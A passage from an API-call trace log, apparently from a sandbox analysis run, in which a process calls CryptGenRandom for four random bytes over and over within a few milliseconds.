dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.320] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.321] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.322] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: 